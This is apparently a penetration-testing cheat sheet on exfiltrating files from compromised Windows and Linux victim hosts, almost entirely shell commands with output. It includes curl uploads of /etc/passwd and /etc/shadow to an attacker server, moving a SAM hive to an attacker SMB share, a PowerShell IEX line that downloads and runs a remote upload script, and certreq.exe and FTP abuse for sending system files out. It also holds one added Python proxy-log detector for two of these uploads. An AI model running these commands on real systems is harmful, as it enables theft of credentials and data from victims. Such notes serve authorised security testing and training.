# Download - Exfiltration

## Tool

Updog

```
updog --ssl --port 9090 --password "exegol4thewin" --directory /opt/resources
```

## Living Off Trusted Sites

{% embed url="<https://lots-project.com/>" %}

## Web transfer

### **Create a Web Server on Linux victim host**

#### Python 3

```shell-session
python3 -m http.server 8000
```

#### Python 2.7

```shell-session
python2.7 -m SimpleHTTPServer
```

#### PHP

```shell-session
php -S 0.0.0.0:8000
```

#### Ruby

```shell-session
ruby -run -ehttpd . -p8000
```

### Create a web server on a Windows host

#### Windows - HFS HTTP File Server

{% embed url="<https://sourceforge.net/projects/hfs/>" %}

#### Powershell\_HttpServer

{% embed url="<https://github.com/zh54321/PowerShell_HttpServer>" %}

### Download file

```shell-session
wget 192.168.49.128:8000/filetotransfer.txt
```

## SCP

{% embed url="<https://linuxize.com/post/how-to-use-scp-command-to-securely-transfer-files/>" %}

```shell-session
scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
```

```
scp remote_username@10.10.0.2:/remote/file.txt /local/directory
```

## Base64

### **Windows**

#### **Transfer from victim host to attack host**

```powershell-session
PS C:\htb> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbX ... <SNIP>
```

```shell-session
echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXB... SNIP ... gICAgbG9jYWxob3N0DQo= | base64 -d > host
```

## SMB

```
$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

```
C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.
```

### Metasploit - Download

{% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %}
[Metasploit](/0xss0rz/pentest/tools/metasploit.md)
{% endcontent-ref %}

### SMBclient - get

{% content-ref url="/pages/3jW53CaRXMUs4f8szugL" %}
[SMB (445, 139) / RPC](/0xss0rz/pentest/protocols/smb-445-139-rpc.md)
{% endcontent-ref %}

`smb: \> get prep-prod.txt`

Source:

{% embed url="<http://www.delafond.org/traducmanfr/man/man1/smbclient.1.html>" %}

### SMBmap - download

{% content-ref url="/pages/3jW53CaRXMUs4f8szugL" %}
[SMB (445, 139) / RPC](/0xss0rz/pentest/protocols/smb-445-139-rpc.md)
{% endcontent-ref %}

```shell-session
$ smbmap -H 10.129.14.128 --download "notes\note.txt"

[+] Starting download: notes\note.txt (116 bytes)
[+] File output to: /htb/10.129.14.128-notes_note.txt
```

### SMB over WebDAV

#### From Windows to Linux

```shell-session
$ sudo pip3 install wsgidav cheroot
```

```shell-session
$ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous 

[sudo] password for plaintext: 
Running without configuration file.
10:02:53.949 - WARNING : App wsgidav.mw.cors.Cors(None).is_disabled() returned True: skipping.
10:02:53.950 - INFO    : WsgiDAV/4.0.1 Python/3.9.2 Linux-5.15.0-15parrot1-amd64-x86_64-with-glibc2.31
10:02:53.950 - INFO    : Lock manager:      LockManager(LockStorageDict)
10:02:53.950 - INFO    : Property manager:  None
10:02:53.950 - INFO    : Domain controller: SimpleDomainController()
10:02:53.950 - INFO    : Registered DAV providers by route:
10:02:53.950 - INFO    :   - '/:dir_browser': FilesystemProvider for path '/usr/local/lib/python3.9/dist-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous)
10:02:53.950 - INFO    :   - '/': FilesystemProvider for path '/tmp' (Read-Write) (anonymous)
10:02:53.950 - WARNING : Basic authentication is enabled: It is highly recommended to enable SSL.
10:02:53.950 - WARNING : Share '/' will allow anonymous write access.
10:02:53.950 - WARNING : Share '/:dir_browser' will allow anonymous read access.
10:02:54.194 - INFO    : Running WsgiDAV/4.0.1 Cheroot/8.6.0 Python 3.9.2
10:02:54.194 - INFO    : Serving on http://0.0.0.0:80 ...
```

```cmd-session
C:\htb> dir \\192.168.49.128\DavWWWRoot

 Volume in drive \\192.168.49.128\DavWWWRoot has no label.
 Volume Serial Number is 0000-0000

 Directory of \\192.168.49.128\DavWWWRoot

05/18/2022  10:05 AM    <DIR>          .
05/18/2022  10:05 AM    <DIR>          ..
05/18/2022  10:05 AM    <DIR>          sharefolder
05/18/2022  10:05 AM                13 filetest.txt
               1 File(s)             13 bytes
               3 Dir(s)  43,443,318,784 bytes free
```

```cmd-session
C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\
```

## FTP

### From Windows victim to Linux

```shell-session
0xss0rz@htb[/htb]$ sudo python3 -m pyftpdlib --port 21 --write

/usr/local/lib/python3.9/dist-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user.
  warnings.warn("write permissions assigned to anonymous user.",
[I 2022-05-18 10:33:31] concurrency model: async
[I 2022-05-18 10:33:31] masquerade (NAT) address: None
[I 2022-05-18 10:33:31] passive ports: None
[I 2022-05-18 10:33:31] >>> starting FTP server on 0.0.0.0:21, pid=5155 <<<
```

```powershell-session
PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
```

or

```cmd-session
C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
```

## Web exfiltration

### Uploadserver

#### Linux to Linux

{% embed url="<https://github.com/Densaugeo/uploadserver>" %}

```shell-session
$ sudo python3 -m pip install --user uploadserver

Collecting uploadserver
  Using cached uploadserver-2.0.1-py3-none-any.whl (6.9 kB)
Installing collected packages: uploadserver
Successfully installed uploadserver-2.0.1
```

```shell-session
# Create a Self-Signed Certificate
$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

Generating a RSA private key
................................................................................+++++
.......+++++
writing new private key to 'server.pem'
-----
```

```shell-session
$ mkdir https && cd https
```

```shell-session
$ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
```

```shell-session
# Upload multiple files
$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

#### Windows victim to Linux

{% embed url="<https://github.com/Densaugeo/uploadserver>" %}

```shell-session
pip3 install uploadserver
```

```shell-session
$ python3 -m uploadserver

File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

For HTTPS, create a self-signed certificate first; see [Web exfiltration - Linux to Linux](#linux-to-linux).

{% embed url="<https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1>" %}

```powershell-session
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

[+] File Uploaded:  C:\Windows\System32\drivers\etc\hosts
[+] FileHash:  5E7241D66FD77E9E8EA866B6278B2373
```

### PowerShell Base64 Web Upload

```powershell-session
PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
```

```shell-session
$ nc -lvnp 8000

listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.129] 50923
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/x-www-form-urlencoded
Host: 192.168.49.128:8000
Content-Length: 1820
Connection: Keep-Alive

...SNIP...
```

```shell-session
echo <base64> | base64 -d -w 0 > hosts
```

### Python

{% embed url="<https://github.com/Densaugeo/uploadserver>" %}

```
sudo python3 -m pip install --user uploadserver
```

```shell-session
$ python3 -m uploadserver 

File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

```shell-session
python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})'
```

## Netcat

nc.exe

{% embed url="<https://github.com/int0x33/nc.exe/>" %}

Commands

{% embed url="<https://juggernaut-sec.com/windows-file-transfers-for-hackers/#Transferring_Files_onto_Victim_Using_Netcat_cmdexe>" %}

## WinRM

```powershell-session
PS C:\htb> Test-NetConnection -ComputerName DATABASE01 -Port 5985

ComputerName     : DATABASE01
RemoteAddress    : 192.168.1.101
RemotePort       : 5985
InterfaceAlias   : Ethernet0
SourceAddress    : 192.168.1.100
TcpTestSucceeded : True
```

```powershell-session
PS C:\htb> $Session = New-PSSession -ComputerName DATABASE01
```

```powershell-session
PS C:\htb> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session
```

## RDP

### rdesktop

```shell-session
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
```

### xfreerdp

```
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
```

### Remmina

{% embed url="<https://cat.pdx.edu/platforms/linux/remote-access/file-sharing-rdp-from-linux/>" %}

### Windows to windows

{% embed url="<https://www.helpwire.app/blog/remote-desktop-transfer-files/>" %}

## LOLBAS

{% embed url="<https://lolbas-project.github.io/#/upload>" %}


### **CertReq.exe**

```cmd-session
C:\htb> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini
Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
```

```shell-session
0xss0rz@htb[/htb]$ sudo nc -lvnp 8000

listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)
Content-Length: 92
Host: 192.168.49.128:8000

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
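A detection-side view of the two netcat captures on this page (the PowerShell Base64 POST and the `certreq.exe -Post` request), added here as an example and not part of the original notes: both requests carry a distinctive User-Agent and POST to a bare IP address, which a proxy-log check can flag. The tab-separated log format, the `ca01.corp.example` allowlist entry, and the function names are assumptions made for this sketch.

```python
import re
from urllib.parse import urlsplit

# User-Agent substrings copied from the two netcat captures on this page.
UA_RULES = {
    "WindowsPowerShell/": "PowerShell web client",
    "NDES client": "certreq.exe -Post",
}
# Assumption: hosts where these clients legitimately POST (e.g. an internal CA).
EXPECTED_HOSTS = {"ca01.corp.example"}
BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed proxy log: method, URL, bytes sent, User-Agent (tab-separated).
SAMPLE_LOG = "\n".join([
    "POST\thttp://192.168.49.128:8000/\t1820\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682",
    "POST\thttp://192.168.49.128:8000/\t92\tMozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)",
    "POST\thttp://ca01.corp.example/certsrv/\t2048\tMozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)",
    "GET\thttp://intranet.corp.example/index.html\t0\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0",
])


def score_request(method, url, user_agent):
    """Return the reasons a single request looks like an ad-hoc upload."""
    host = urlsplit(url).hostname or ""
    if method.upper() != "POST" or host in EXPECTED_HOSTS:
        return []
    reasons = [label for needle, label in UA_RULES.items() if needle in user_agent]
    if BARE_IP.match(host):
        reasons.append("POST to bare IP address")
    return reasons


def find_suspect_uploads(log_text):
    """Parse the log and return (url, bytes_sent, reasons) for flagged lines."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split("\t", 3)
        if len(fields) != 4 or not fields[2].isdigit():
            continue  # skip malformed lines instead of crashing
        method, url, sent, user_agent = fields
        reasons = score_request(method, url, user_agent)
        if reasons:
            hits.append((url, int(sent), reasons))
    return hits


if __name__ == "__main__":
    for url, sent, reasons in find_suspect_uploads(SAMPLE_LOG):
        print(f"{url}  {sent} bytes  -> {', '.join(reasons)}")
```
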

## GTFOBins

{% embed url="<https://gtfobins.github.io/#+file%20upload>" %}


## Metasploit

{% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %}
[Metasploit](/0xss0rz/pentest/tools/metasploit.md)
{% endcontent-ref %}

```
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >
```

## WinRM

{% content-ref url="/pages/5zE4duLRkawZtstWjbb7" %}
[Evil-WinRM](/0xss0rz/pentest/tools/evil-winrm.md)
{% endcontent-ref %}

```
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip
```

## Resources

{% embed url="<https://juggernaut-sec.com/windows-file-transfers-for-hackers/>" %}

{% embed url="<https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/>" %}

{% embed url="<https://ppn.snovvcrash.rocks/pentest/infrastructure/file-transfer>" %}

